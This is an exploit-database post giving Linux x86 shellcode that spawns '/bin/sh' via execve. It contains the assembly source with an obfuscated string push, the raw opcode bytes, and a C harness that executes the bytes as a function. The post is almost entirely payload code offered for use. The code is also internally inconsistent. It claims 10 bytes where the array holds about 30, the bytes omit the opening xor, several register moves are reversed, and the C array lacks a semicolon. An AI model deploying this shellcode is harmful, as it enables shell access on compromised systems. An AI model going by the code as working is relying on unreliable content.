Share
## https://sploitus.com/exploit?id=1337DAY-ID-34856
# Exploit Title: Linux/x86 - execve "/bin/sh" (10 bytes)
# Google Dork: None
# Exploit Author: cybersaki
# Vendor Homepage: None
# Software Link: None
# Version: None
# Tested on: Kali linux 2020.2a i386 x86
# CVE : none
# Shellcode-length : 10
# SLAE-id : Purchased | [email protected]

# Reference : http://shell-storm.org/shellcode/files/shellcode-811.php
/*******************************************************************************

global _start

section .text

_start:

xor    eax, eax      ; zero our eax
push   eax

; push   0x68732f2f

mov eax, 0xd0e65e5e
ror eax, 1                       ; shift the register by 1 ro right
push eax

; push   0x6e69622f
add eax, 0x5f63300               ; add 5f63300 to eax register to push 6e69622f                                       
push eax

mov    esp,ebx
mov    eax,ecx
mov    eax,edx
mov    al,0xb
int    0x80

; End section for exit call
xor    eax,eax
inc    eax
int    0x80


*******************************************************************************/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x50\xb8\x5e\x5e\xe6\xd0\xd1\xc8\x50\x05\x00\x33\xf6\x05\x50\x89\xdc\x89\xc8\x89\xd0\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

int main()
{

        printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;

        ret();

}

#  0day.today [2020-08-24]  #